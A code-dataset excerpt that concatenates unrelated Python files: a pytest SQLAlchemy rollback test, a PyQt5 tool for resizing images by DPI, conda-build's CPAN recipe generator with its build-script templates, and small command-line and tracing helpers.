db_session.commit()
# Access the address through an ORM attribute
assert account_inst.addresses
# Delete the address out from under account_inst and the ORM
db_session.delete(address_inst)
# shouldn't see an exception like
# sqlalchemy.exc.InvalidRequestError:
# Instance XXX has been deleted.
# Use the make_transient() function to send
# this object back to the transient state.
db_session.commit()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=1)
```
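These tests pass because the plugin wraps each test in an outer database transaction that is rolled back at teardown, so nothing a test does can leak into the next one. A minimal sketch of that isolation pattern with plain SQLAlchemy (the fixture and engine names are assumptions, not the plugin's actual implementation, and real implementations also use SAVEPOINTs so that in-test commits and rollbacks survive):
```python
import pytest
from sqlalchemy.orm import sessionmaker

@pytest.fixture
def db_session(db_engine):
    # Bind the session to a dedicated connection with an open outer transaction.
    connection = db_engine.connect()
    transaction = connection.begin()
    session = sessionmaker(bind=connection)()
    yield session
    # Discard everything the test did, regardless of commits inside the test.
    session.close()
    transaction.rollback()
    connection.close()
```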
|
{
"source": "JeanCollomb/Resize_Image_DPI",
"score": 2
}
|
#### File: Resize_Image_DPI/exemple/interface.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(511, 379)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setGeometry(QtCore.QRect(10, 10, 491, 91))
self.groupBox.setObjectName("groupBox")
self.pushButton_selection_photos = QtWidgets.QPushButton(self.groupBox)
self.pushButton_selection_photos.setGeometry(QtCore.QRect(10, 20, 231, 23))
self.pushButton_selection_photos.setObjectName("pushButton_selection_photos")
self.pushButton_selection_dossier_export = QtWidgets.QPushButton(self.groupBox)
self.pushButton_selection_dossier_export.setGeometry(QtCore.QRect(250, 20, 231, 23))
self.pushButton_selection_dossier_export.setObjectName("pushButton_selection_dossier_export")
self.label_info_init = QtWidgets.QLabel(self.groupBox)
self.label_info_init.setGeometry(QtCore.QRect(10, 50, 231, 31))
self.label_info_init.setAlignment(QtCore.Qt.AlignCenter)
self.label_info_init.setObjectName("label_info_init")
self.label = QtWidgets.QLabel(self.groupBox)
self.label.setGeometry(QtCore.QRect(250, 50, 231, 31))
font = QtGui.QFont()
font.setItalic(True)
font.setStyleStrategy(QtGui.QFont.PreferDefault)
self.label.setFont(font)
self.label.setAcceptDrops(False)
self.label.setScaledContents(False)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setWordWrap(True)
self.label.setObjectName("label")
self.groupBox_2 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_2.setGeometry(QtCore.QRect(10, 110, 241, 101))
self.groupBox_2.setObjectName("groupBox_2")
self.checkBox_multi_process = QtWidgets.QCheckBox(self.groupBox_2)
self.checkBox_multi_process.setGeometry(QtCore.QRect(10, 70, 158, 17))
self.checkBox_multi_process.setObjectName("checkBox_multi_process")
self.checkBox_pdf = QtWidgets.QCheckBox(self.groupBox_2)
self.checkBox_pdf.setGeometry(QtCore.QRect(10, 46, 158, 17))
self.checkBox_pdf.setObjectName("checkBox_pdf")
self.checkBox_jpg = QtWidgets.QCheckBox(self.groupBox_2)
self.checkBox_jpg.setGeometry(QtCore.QRect(10, 22, 158, 17))
self.checkBox_jpg.setObjectName("checkBox_jpg")
self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_3.setGeometry(QtCore.QRect(10, 220, 491, 111))
self.groupBox_3.setObjectName("groupBox_3")
self.progressBar = QtWidgets.QProgressBar(self.groupBox_3)
self.progressBar.setGeometry(QtCore.QRect(10, 80, 471, 21))
self.progressBar.setProperty("value", 0)
self.progressBar.setObjectName("progressBar")
self.label_info_conversion = QtWidgets.QLabel(self.groupBox_3)
self.label_info_conversion.setGeometry(QtCore.QRect(10, 51, 471, 21))
self.label_info_conversion.setAlignment(QtCore.Qt.AlignCenter)
self.label_info_conversion.setObjectName("label_info_conversion")
self.pushButton_lancement_conversion = QtWidgets.QPushButton(self.groupBox_3)
self.pushButton_lancement_conversion.setGeometry(QtCore.QRect(10, 22, 471, 23))
self.pushButton_lancement_conversion.setObjectName("pushButton_lancement_conversion")
self.groupBox_4 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_4.setGeometry(QtCore.QRect(260, 110, 241, 101))
self.groupBox_4.setObjectName("groupBox_4")
self.lineEdit_DPI = QtWidgets.QLineEdit(self.groupBox_4)
self.lineEdit_DPI.setGeometry(QtCore.QRect(130, 30, 101, 20))
font = QtGui.QFont()
font.setItalic(True)
self.lineEdit_DPI.setFont(font)
self.lineEdit_DPI.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_DPI.setClearButtonEnabled(True)
self.lineEdit_DPI.setObjectName("lineEdit_DPI")
self.label_2 = QtWidgets.QLabel(self.groupBox_4)
self.label_2.setGeometry(QtCore.QRect(10, 30, 111, 16))
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(self.groupBox_4)
self.label_3.setGeometry(QtCore.QRect(10, 60, 111, 31))
self.label_3.setScaledContents(False)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setWordWrap(True)
self.label_3.setObjectName("label_3")
self.lineEdit_largeur = QtWidgets.QLineEdit(self.groupBox_4)
self.lineEdit_largeur.setGeometry(QtCore.QRect(130, 70, 101, 20))
font = QtGui.QFont()
font.setItalic(True)
self.lineEdit_largeur.setFont(font)
self.lineEdit_largeur.setToolTip("")
self.lineEdit_largeur.setInputMask("")
self.lineEdit_largeur.setAlignment(QtCore.Qt.AlignCenter)
self.lineEdit_largeur.setClearButtonEnabled(True)
self.lineEdit_largeur.setObjectName("lineEdit_largeur")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 511, 21))
self.menubar.setObjectName("menubar")
self.menuFichier = QtWidgets.QMenu(self.menubar)
self.menuFichier.setObjectName("menuFichier")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionQuitter = QtWidgets.QAction(MainWindow)
self.actionQuitter.setObjectName("actionQuitter")
self.menuFichier.addAction(self.actionQuitter)
self.menubar.addAction(self.menuFichier.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.groupBox.setTitle(_translate("MainWindow", "Initialisation"))
self.pushButton_selection_photos.setText(_translate("MainWindow", "Selection des photos à convertir"))
self.pushButton_selection_dossier_export.setText(_translate("MainWindow", "Selection du dossier d\'exportation"))
self.label_info_init.setText(_translate("MainWindow", "Veuiller sélectionner les photos à convertir"))
self.label.setText(_translate("MainWindow", "Un sous dossier \'export\' sera créé automatiquement dans le dossier sélectionné"))
self.groupBox_2.setTitle(_translate("MainWindow", "Options"))
self.checkBox_multi_process.setText(_translate("MainWindow", "Multi-process"))
self.checkBox_pdf.setText(_translate("MainWindow", "Convertir en .pdf"))
self.checkBox_jpg.setText(_translate("MainWindow", "Convertir en .jpg"))
self.groupBox_3.setTitle(_translate("MainWindow", "Conversion"))
self.label_info_conversion.setText(_translate("MainWindow", "informations convertion"))
self.pushButton_lancement_conversion.setText(_translate("MainWindow", "Lancement de la convertion"))
self.groupBox_4.setTitle(_translate("MainWindow", "Réglages"))
self.lineEdit_DPI.setText(_translate("MainWindow", "300"))
self.label_2.setText(_translate("MainWindow", "DPI"))
self.label_3.setText(_translate("MainWindow", "Dimension max. image finale (cm)"))
self.lineEdit_largeur.setText(_translate("MainWindow", "21"))
self.menuFichier.setTitle(_translate("MainWindow", "Fichier"))
self.actionQuitter.setText(_translate("MainWindow", "Quitter"))
```
#### File: Resize_Image_DPI/exemple/main_pydpi.py
```python
import sys
from multiprocessing import cpu_count
from threading import Thread
from PIL import Image
from os import makedirs, listdir
from os.path import exists, normpath, dirname, getsize
from PyQt5.QtWidgets import QApplication, QMainWindow, qApp, QFileDialog
from interface import Ui_MainWindow  # change the file name and Ui class name here if needed
###############################################################################
###############################################################################
class MainWindow(QMainWindow, Ui_MainWindow):  # change the Ui class name here if needed
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
qApp.installEventFilter(self)
self.setupUi(self)
        # Set up the signal/slot connections here
self.pushButton_selection_photos.clicked.connect(self.fct_selection_images)
self.pushButton_selection_dossier_export.clicked.connect(self.fct_selection_dossier_export)
self.pushButton_lancement_conversion.clicked.connect(self.lancement_conversion)
self.actionQuitter.triggered.connect(qApp.quit)
self.show()
###############################################################################
###############################################################################
    # Functions associated with the connections created above
def lancement_conversion(self):
        '''Validate user input and launch the conversion.'''
self.label_info_conversion.setText('Conversion en cours ...')
self.progressBar.setValue(0)
self.dpi = None
self.dim_max = None
self.label.repaint()
try:
self.fct_recuperation_donnees()
try:
self.fct_conversion()
            except Exception:
self.label_info_conversion.setText('Sélectionner des images')
self.label.repaint()
        except (ValueError, TypeError):
            self.label_info_conversion.setText('Le DPI et la dimension max. doivent être des chiffres')
def fct_conversion(self):
"""
Fonction pour convertir les images
"""
if not exists(self.chemin_export):
makedirs(self.chemin_export)
if self.checkBox_multi_process.isChecked():
CPU_NUMBER = cpu_count()
if len(self.liste_images) > CPU_NUMBER:
processes = []
for processus in range(CPU_NUMBER):
file_per_processus = round(len(self.liste_images)/CPU_NUMBER)
if processus == CPU_NUMBER-1:
files_list = self.liste_images[(processus * file_per_processus):]
else :
files_list = self.liste_images[processus * file_per_processus:(processus + 1) * file_per_processus]
print('CPU ', str(processus+1), ': {} pictures'.format(len(files_list)))
t = Thread(target=self.fct_redimensionnement_image, args = (files_list,))
processes.append(t)
for t in processes:
t.start()
for t in processes:
t.join()
else:
self.fct_redimensionnement_image(self.liste_images)
else :
self.fct_redimensionnement_image(self.liste_images)
size_before = round(self.size(self.liste_images),1)
size_after = round(self.size(listdir(self.chemin_export), self.chemin_export),1)
size_diff = size_after - size_before
gain = round((100-size_after*100/size_before),1)
self.label_info_conversion.setText('Tâche terminée ! Taille ini. : {}Mo ; Taille fin. : {}Mo ; Gain : {}%'.format(size_before, size_after, gain))
def fct_selection_dossier_export(self):
        '''Select the export folder.'''
pathToWallpaperDir = normpath(
QFileDialog.getExistingDirectory(self))
        self.chemin_export = pathToWallpaperDir + '\\export'
def fct_selection_images(self):
        '''Select the images to convert.'''
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getOpenFileNames(self,"Choisir les images",
"",
"All Files (*);;Images (*.png *.jpg *.bmp *.tiff)",
options=options)
nombre_images = len(fileName)
self.liste_images = fileName
self.chemin_courant = dirname(fileName[0])
        self.chemin_export = dirname(fileName[0]) + '\\export'
self.label_info_init.setText('{} images sélectionnées'.format(nombre_images))
def fct_redimensionnement_image(self, files_list):
        '''Resize a batch of images.'''
for idx, file in enumerate(files_list):
self.label.repaint()
image = Image.open(file)
image_name = file.split('/')[-1]
            image_wo_extension = image_name.rsplit('.', 1)[0]  # strip only the final extension
self.fct_calcul_nouvelles_dimensions(self.dpi, self.dim_max)
ratio = self.dim_max_new / max(image.size[0], image.size[1])
WIDTH_new = int(image.size[0] * ratio)
HEIGHT_new = int(image.size[1] * ratio)
image_new = image.resize((WIDTH_new, HEIGHT_new), Image.ANTIALIAS)
if self.checkBox_jpg.isChecked():
image_new = image_new.convert('RGB')
new_name = str(self.chemin_export) + '\\' + str(image_wo_extension) + '.jpg'
image_new.save(new_name)
if self.checkBox_pdf.isChecked():
image_new = image_new.convert('RGB')
new_name = str(self.chemin_export) + '\\' + str(image_wo_extension) + '.pdf'
image_new.save(new_name)
            if not self.checkBox_jpg.isChecked() and not self.checkBox_pdf.isChecked():
image_new = image_new.convert('RGB')
new_name = str(self.chemin_export) + '\\' + str(image_wo_extension) + '.jpg'
image_new.save(new_name)
            if self.checkBox_multi_process.isChecked():
                pass
            else:
                self.label_info_conversion.setText(new_name)
                # progressBar.setValue() expects an int
                avancement = idx * 100 // len(self.liste_images)
                self.progressBar.setValue(avancement)
self.progressBar.setValue(100)
def fct_recuperation_donnees(self):
        '''Read the values entered by the user.'''
self.dpi = int(self.lineEdit_DPI.text())
self.dim_max = int(self.lineEdit_largeur.text())
def fct_calcul_nouvelles_dimensions(self, dpi, dim_max):
        '''Compute the new maximum pixel dimension of the image.'''
self.dim_max_new = int((dpi * dim_max)/2.54)
    def size(self, list_file, path=None):
        '''Return the total size of the given files, in MiB.'''
        if path is None:
            size = [getsize(f) for f in list_file]
        else:
            size = [getsize(str(path) + '\\' + f) for f in list_file]
return sum(size)/(1024**2)
###############################################################################
###############################################################################
if __name__ == '__main__':
app = QApplication(sys.argv)
win = MainWindow()
# test = TestClass()
sys.exit(app.exec_())
###############################################################################
```
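For reference, fct_calcul_nouvelles_dimensions above implements pixels = DPI * size_cm / 2.54 (2.54 cm per inch). A quick sanity check with the UI defaults (300 DPI, 21 cm):
```python
# Sanity check of the pixel-dimension formula used above (UI default values).
dpi, dim_max_cm = 300, 21
dim_max_px = int((dpi * dim_max_cm) / 2.54)
print(dim_max_px)  # 2480 -- an A4 width (21 cm) rendered at 300 DPI
```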
|
{
"source": "jeanconn/conda-build",
"score": 2
}
|
#### File: conda-build/conda_build/cpan.py
```python
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import subprocess
import sys
from distutils.version import LooseVersion
from glob import glob
from io import open
from os import makedirs
from os.path import basename, dirname, join, exists
from conda.api import get_index
from conda.fetch import TmpDownload
from conda.resolve import MatchSpec, Resolve
from conda.utils import memoized
from conda_build.config import config
# Python 2.x backward compatibility
if sys.version_info < (3, 0):
str = unicode
CPAN_META = """\
package:
name: {packagename}
version: !!str {version}
source:
{useurl}fn: {filename}
{useurl}url: {cpanurl}
{usemd5}md5: {md5}
# patches:
# List any patch files here
# - fix.patch
{build_comment}build:
# If this is a new build for the same version, increment the build
# number. If you do not include this key, it defaults to 0.
{build_comment}number: 1
requirements:
build:
- perl{build_depends}
run:
- perl{run_depends}
test:
# Perl 'use' tests
{import_comment}imports:{import_tests}
# You can also put a file called run_test.pl (or run_test.py) in the recipe
# that will be run at test time.
# requires:
# Put any additional test requirements here. For example
# - nose
about:
home: {homeurl}
license: {license}
summary: {summary}
# See
# http://docs.continuum.io/conda/build.html for
# more information about meta.yaml
"""
CPAN_BUILD_SH = """\
#!/bin/bash
# If it has Build.PL use that, otherwise use Makefile.PL
if [ -f Build.PL ]; then
perl Build.PL
./Build
./Build test
# Make sure this goes in site
./Build install --installdirs site
elif [ -f Makefile.PL ]; then
# Make sure this goes in site
perl Makefile.PL INSTALLDIRS=site
make
make test
make install
else
echo 'Unable to find Build.PL or Makefile.PL. You need to modify build.sh.'
exit 1
fi
# Add more build steps here, if they are necessary.
# See
# http://docs.continuum.io/conda/build.html
# for a list of environment variables that are set during the build process.
"""
CPAN_BLD_BAT = """\
:: If it has Build.PL use that, otherwise use Makefile.PL
IF exist Build.PL (
perl Build.PL
IF errorlevel 1 exit 1
Build
IF errorlevel 1 exit 1
Build test
:: Make sure this goes in site
Build install --installdirs site
IF errorlevel 1 exit 1
) ELSE IF exist Makefile.PL (
:: Make sure this goes in site
perl Makefile.PL INSTALLDIRS=site
IF errorlevel 1 exit 1
make
IF errorlevel 1 exit 1
make test
IF errorlevel 1 exit 1
make install
) ELSE (
ECHO 'Unable to find Build.PL or Makefile.PL. You need to modify bld.bat.'
exit 1
)
:: Add more build steps here, if they are necessary.
:: See
:: http://docs.continuum.io/conda/build.html
:: for a list of environment variables that are set during the build process.
"""
class InvalidReleaseError(RuntimeError):
'''
An exception that is raised when a release is not available on MetaCPAN.
'''
pass
def main(args, parser):
'''
Creates a bunch of CPAN conda recipes.
'''
perl_version = config.CONDA_PERL
package_dicts = {}
[output_dir] = args.output_dir
indent = '\n - '
args.packages = list(reversed(args.packages))
processed_packages = set()
orig_version = args.version
while args.packages:
package = args.packages.pop()
        # If the package was passed as `PACKAGE=VERSION`, extract the version
if '=' in package:
package, __, args.version = package.partition('=')
else:
args.version = orig_version
# Skip duplicates
if package in processed_packages:
continue
processed_packages.add(package)
# Convert modules into distributions
orig_package = package
package = dist_for_module(args.meta_cpan_url, package, perl_version)
if package == 'perl':
print(("WARNING: {0} is a Perl core module that is not developed " +
"outside of Perl, so we are skipping creating a recipe " +
"for it.").format(orig_package))
continue
elif package not in {orig_package, orig_package.replace('::', '-')}:
print(("WARNING: {0} was part of the {1} distribution, so we are " +
"making a recipe for {1} instead.").format(orig_package,
package))
latest_release_data = get_release_info(args.meta_cpan_url, package,
None, perl_version)
packagename = perl_to_conda(package)
# Skip duplicates
if ((args.version is not None and ((packagename + '-' + args.version) in
processed_packages)) or
((packagename + '-' + latest_release_data['version']) in
processed_packages)):
continue
d = package_dicts.setdefault(package, {'packagename': packagename,
'run_depends': '',
'build_depends': '',
'build_comment': '# ',
'test_commands': '',
'usemd5': '',
'useurl': '',
'summary': "''",
'import_tests': ''})
# Fetch all metadata from CPAN
core_version = core_module_version(package, perl_version)
release_data = get_release_info(args.meta_cpan_url, package,
(LooseVersion(args.version) if
args.version is not None else
core_version),
perl_version)
# Check if versioned recipe directory already exists
dir_path = join(output_dir, '-'.join((packagename,
release_data['version'])))
if exists(dir_path):
raise RuntimeError("directory already exists: %s" % dir_path)
# If this is something we're downloading, get MD5
if release_data['download_url']:
d['cpanurl'] = release_data['download_url']
d['md5'], size = get_checksum_and_size(release_data['download_url'])
d['filename'] = basename(release_data['archive'])
print("Using url %s (%s) for %s." % (d['cpanurl'], size, package))
else:
d['useurl'] = '#'
d['usemd5'] = '#'
d['cpanurl'] = ''
d['filename'] = ''
d['md5'] = ''
try:
d['homeurl'] = release_data['resources']['homepage']
except KeyError:
d['homeurl'] = 'http://metacpan.org/pod/' + package
if 'abstract' in release_data:
d['summary'] = repr(release_data['abstract']).lstrip('u')
d['license'] = (release_data['license'][0] if
isinstance(release_data['license'], list) else
release_data['license'])
d['version'] = release_data['version']
processed_packages.add(packagename + '-' + d['version'])
# Add Perl version to core module requirements, since these are empty
# packages, unless we're newer than what's in core
if core_version is not None and ((args.version is None) or
(core_version >=
LooseVersion(args.version))):
d['useurl'] = '#'
d['usemd5'] = '#'
empty_recipe = True
# Add dependencies to d if not in core, or newer than what's in core
else:
build_deps, run_deps, packages_to_append = deps_for_package(
package, release_data, perl_version, args, output_dir,
processed_packages)
d['build_depends'] += indent.join([''] + list(build_deps |
run_deps))
d['run_depends'] += indent.join([''] + list(run_deps))
args.packages.extend(packages_to_append)
empty_recipe = False
# Create import tests
module_prefix = package.replace('::', '-').split('-')[0]
if 'provides' in release_data:
for provided_mod in sorted(set(release_data['provides'])):
# Filter out weird modules that don't belong
if (provided_mod.startswith(module_prefix) and
'::_' not in provided_mod):
d['import_tests'] += indent + provided_mod
if d['import_tests']:
d['import_comment'] = ''
else:
d['import_comment'] = '# '
# Write recipe files to a versioned directory
makedirs(dir_path)
print("Writing recipe for %s-%s" % (packagename, d['version']))
with open(join(dir_path, 'meta.yaml'), 'w') as f:
f.write(CPAN_META.format(**d))
with open(join(dir_path, 'build.sh'), 'w') as f:
if empty_recipe:
f.write('#!/bin/bash\necho "Nothing to do."\n')
else:
f.write(CPAN_BUILD_SH.format(**d))
with open(join(dir_path, 'bld.bat'), 'w') as f:
if empty_recipe:
f.write('echo "Nothing to do."\n')
else:
f.write(CPAN_BLD_BAT.format(**d))
print("Done")
@memoized
def latest_pkg_version(pkg):
'''
:returns: the latest version of the specified conda package available
'''
r = Resolve(get_index())
try:
pkg_list = sorted(r.get_pkgs(MatchSpec(pkg)))
except RuntimeError:
pkg_list = None
if pkg_list:
pkg_version = LooseVersion(pkg_list[-1].version)
else:
pkg_version = None
return pkg_version
@memoized
def core_module_version(module, version):
'''
:param module: Name of a Perl core module
:type module: str
:returns: The version of the specified module that is currently available
in the specified version of Perl. If the version is `undef`, but
the module is actually part of the Perl core, the version of Perl
passed in will be used as the module version.
'''
# In case we were given a dist, convert to module
module = module.replace('-', '::')
if version is None:
version = LooseVersion(config.CONDA_PERL)
else:
version = LooseVersion(version)
cmd = ['corelist', '-v', str(version), module]
try:
output = subprocess.check_output(cmd).decode('utf-8')
except subprocess.CalledProcessError:
sys.exit(('Error: command failed: %s\nPlease make sure you have ' +
'the perl conda package installed in your default ' +
'environment.') % ' '.join(cmd))
mod_version = output.split()[1]
# If undefined, that could either mean it's versionless or not in core
if mod_version == 'undef':
# Check if it's actually in core
cmd = ['corelist', module]
output = subprocess.check_output(cmd).decode('utf-8')
# If it's in core...
if 'perl v' in output:
first_version = output.partition('perl v')[2].strip()
first_version = LooseVersion(first_version)
# If it's newer than the specified version, return None
if LooseVersion(first_version) > LooseVersion(version):
mod_version = None
else:
mod_version = version
# If it's not, return None
else:
mod_version = None
else:
mod_version = LooseVersion(mod_version)
return mod_version
def deps_for_package(package, release_data, perl_version, args, output_dir,
processed_packages):
'''
Build the sets of dependencies and packages we need recipes for. This should
only be called for non-core modules/distributions, as dependencies are
ignored for core modules.
:param package: Perl distribution we're checking dependencies of.
:type package: str
:param release_data: The metadata about the current release of the package.
:type release_data: dict
:param perl_version: The target version of Perl we're building this for.
This only really matters for core modules.
:type perl_version: str
:param args: The command-line arguments passed to the skeleton command.
:type args: Namespace
:param output_dir: The output directory to write recipes to
:type output_dir: str
:param processed_packages: The set of packages we have built recipes for
already.
:type processed_packages: set of str
:returns: Build dependencies, runtime dependencies, and set of packages to
add to list of recipes to create.
:rtype: 3-tuple of sets
'''
# Create lists of dependencies
build_deps = set()
run_deps = set()
packages_to_append = set()
print('Processing dependencies for %s...' % package, end='')
sys.stdout.flush()
for dep_dict in release_data['dependency']:
# Only care about requirements
if dep_dict['relationship'] == 'requires':
print('.', end='')
sys.stdout.flush()
# Format dependency string (with Perl trailing dist comment)
orig_dist = dist_for_module(args.meta_cpan_url, dep_dict['module'],
perl_version)
dep_entry = perl_to_conda(orig_dist)
# Skip perl as a dependency, since it's already in list
if orig_dist.lower() == 'perl':
continue
# See if version is specified
if dep_dict['version'] in {'', 'undef'}:
dep_dict['version'] = '0'
dep_version = LooseVersion(dep_dict['version'])
# Make sure specified version is valid
try:
get_release_info(args.meta_cpan_url, dep_dict['module'],
dep_version, perl_version, dependency=True)
except InvalidReleaseError:
print(('WARNING: The version of %s listed as a ' +
'dependency for %s, %s, is not available on MetaCPAN, ' +
'so we are just assuming the latest version is ' +
'okay.') % (orig_dist, package, str(dep_version)))
dep_version = LooseVersion('0')
# Add version number to dependency, if it's newer than latest
# we have package for.
if dep_version > LooseVersion('0'):
pkg_version = latest_pkg_version(dep_entry)
# If we don't have a package, use core version as version
if pkg_version is None:
pkg_version = core_module_version(dep_entry,
perl_version)
# If no package is available at all, it's in the core, or
# the latest is already good enough, don't specify version.
# This is because conda doesn't support > in version
# requirements.
if pkg_version is not None and (dep_version > pkg_version):
dep_entry += ' ' + dep_dict['version']
# If recursive, check if we have a recipe for this dependency
if args.recursive:
# If dependency entry is versioned, make sure this is too
if ' ' in dep_entry:
if not exists(join(output_dir, dep_entry.replace('::',
'-'))):
packages_to_append.add('='.join((orig_dist,
dep_dict['version'])))
elif not glob(join(output_dir, (dep_entry + '-[v0-9][0-9.]*'))):
packages_to_append.add(orig_dist)
# Add to appropriate dependency list
if dep_dict['phase'] == 'runtime':
run_deps.add(dep_entry)
# Handle build deps
elif dep_dict['phase'] != 'develop':
build_deps.add(dep_entry)
print('done')
sys.stdout.flush()
return build_deps, run_deps, packages_to_append
@memoized
def dist_for_module(cpan_url, module, perl_version):
'''
Given a name that could be a module or a distribution, return the
distribution.
'''
    # First check if it's already a distribution
try:
with TmpDownload('{}/v0/release/{}'.format(cpan_url,
module)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
rel_dict = json.load(dist_json_file)
# If there was an error, module may actually be a module
except RuntimeError:
rel_dict = None
else:
distribution = module
    # If not a distribution, check whether it's a module and map it to one
if rel_dict is None:
try:
with TmpDownload('{}/v0/module/{}'.format(cpan_url,
module)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
mod_dict = json.load(dist_json_file)
# If there was an error, report it
except RuntimeError:
core_version = core_module_version(module, perl_version)
if core_version is None:
sys.exit(('Error: Could not find module or distribution named' +
' %s on MetaCPAN') % module)
else:
distribution = 'perl'
else:
distribution = mod_dict['distribution']
return distribution
def get_release_info(cpan_url, package, version, perl_version,
dependency=False):
'''
Return a dictionary of the JSON information stored at cpan.metacpan.org
corresponding to the given package/dist/module.
'''
# Transform module name to dist name if necessary
orig_package = package
package = dist_for_module(cpan_url, package, perl_version)
package = package.replace('::', '-')
# Get latest info to find author, which is necessary for retrieving a
# specific version
try:
with TmpDownload('{}/v0/release/{}'.format(cpan_url, package)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
rel_dict = json.load(dist_json_file)
rel_dict['version'] = rel_dict['version'].lstrip('v')
except RuntimeError as e:
core_version = core_module_version(orig_package, perl_version)
if core_version is not None and (version is None or
(version == core_version)):
print(("WARNING: {0} is not available on MetaCPAN, but it's a " +
"core module, so we do not actually need the source file, " +
"and are omitting the URL and MD5 from the recipe " +
"entirely.").format(orig_package))
rel_dict = {'version': str(core_version), 'download_url': '',
'license': ['perl_5'], 'dependency': {}}
else:
sys.exit(("Error: Could not find any versions of package %s on " +
"MetaCPAN.") % (orig_package))
# If the latest isn't the version we're looking for, we have to do another
# request
version_str = str(version)
if (version is not None) and (version != LooseVersion('0') and
(rel_dict['version'] != version_str)):
author = rel_dict['author']
try:
with TmpDownload('{}/v0/release/{}/{}-{}'.format(cpan_url,
author,
package,
version_str)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
new_rel_dict = json.load(dist_json_file)
                    new_rel_dict['version'] = new_rel_dict['version'].lstrip('v')
# Check if this is a core module, and don't die if it is
except RuntimeError:
core_version = core_module_version(orig_package, perl_version)
if core_version is not None and (version == core_version):
print(("WARNING: Version {0} of {1} is not available on " +
"MetaCPAN, but it's a core module, so we do not " +
"actually need the source file, and are omitting the " +
"URL and MD5 from the recipe " +
"entirely.").format(version_str, orig_package))
rel_dict['version'] = version_str
rel_dict['download_url'] = ''
elif LooseVersion(rel_dict['version']) > version:
if not dependency:
print(("WARNING: Version {0} of {1} is not available on " +
"MetaCPAN, but a newer version ({2}) is, so we " +
"will use that " +
"instead.").format(version_str, orig_package,
rel_dict['version']))
else:
raise InvalidReleaseError(("Version %s of %s is not available" +
" on MetaCPAN. You may want to use" +
" the latest version, %s, instead.")
% (version_str, orig_package,
rel_dict['version']))
else:
rel_dict = new_rel_dict
return rel_dict
def get_checksum_and_size(download_url):
'''
Looks in the CHECKSUMS file in the same directory as the file specified
at download_url and returns the md5 hash and file size.
'''
base_url = dirname(download_url)
filename = basename(download_url)
with TmpDownload(base_url + '/CHECKSUMS') as checksum_path:
with open(checksum_path) as checksum_file:
found_file = False
md5 = None
size = None
for line in checksum_file:
line = line.strip()
if line.startswith("'" + filename):
found_file = True
elif found_file:
if line.startswith("'md5'"):
md5 = line.split("=>")[1].strip("', ")
elif line.startswith("'size"):
size = line.split("=>")[1].strip("', ")
break
# This should never happen, but just in case
elif line.startswith('}'):
break
return md5, size
def perl_to_conda(name):
''' Sanitizes a Perl package name for use as a conda package name. '''
return 'perl-' + name.replace('::', '-').lower()
```
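For reference, the naming scheme implemented by perl_to_conda above maps CPAN distribution and module names onto conda package names; two illustrative calls (example names chosen arbitrarily):
```python
perl_to_conda('Module::Build')  # -> 'perl-module-build'
perl_to_conda('libwww-perl')    # -> 'perl-libwww-perl'
```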
#### File: conda-build/conda_build/header_test.py
```python
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import subprocess
from distutils.spawn import find_executable
import shlex
def call_args(string):
args = shlex.split(string)
arg0 = args[0]
args[0] = find_executable(arg0)
if not args[0]:
sys.exit("Command not found: '%s'" % arg0)
try:
subprocess.check_call(args)
except subprocess.CalledProcessError:
sys.exit('Error: command failed: %s' % ' '.join(args))
# --- end header
```
#### File: conda-build/conda_build/main_index.py
```python
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import argparse
import os
from locale import getpreferredencoding
from os.path import abspath
from conda.compat import PY3
from conda_build.index import update_index
def main():
p = argparse.ArgumentParser(
description="Update package index metadata files in given directories")
p.add_argument('dir',
help='Directory that contains an index to be updated.',
nargs='*',
default=[os.getcwd()])
p.add_argument('-f', "--force",
action="store_true",
help="force reading all files")
p.add_argument('-q', "--quiet",
action="store_true")
args = p.parse_args()
dir_paths = [abspath(path) for path in args.dir]
# Don't use byte strings in Python 2
if not PY3:
dir_paths = [path.decode(getpreferredencoding()) for path in dir_paths]
for path in dir_paths:
update_index(path, verbose=(not args.quiet), force=args.force)
if __name__ == '__main__':
main()
```
|
{
"source": "JeanContreras12/ColungaRepo",
"score": 2
}
|
#### File: ColungaRepo/ColungaApp/views.py
```python
from django.shortcuts import render
def index(request):  # we receive a request object as the first argument
return render(request,'ColungaApp/index.html')
#def login(request):
#return render(request,'ColungaApp/login.html')
```
|
{
"source": "JeanDagenais/Python-Examples",
"score": 3
}
|
#### File: JeanDagenais/Python-Examples/tracing_service.py
```python
import inspect
import linecache
def trace_line_v2(frame, event, arg):
if event != 'line':
return
# print '\n----- trace_line ----------------------------------------------'
# print 'frame: %s' % frame
# print 'event: %s' % event
# print 'arg: %s' % arg
#
# print 'frame: %s' % frame
# print 'frame.f_code: %s' % frame.f_code
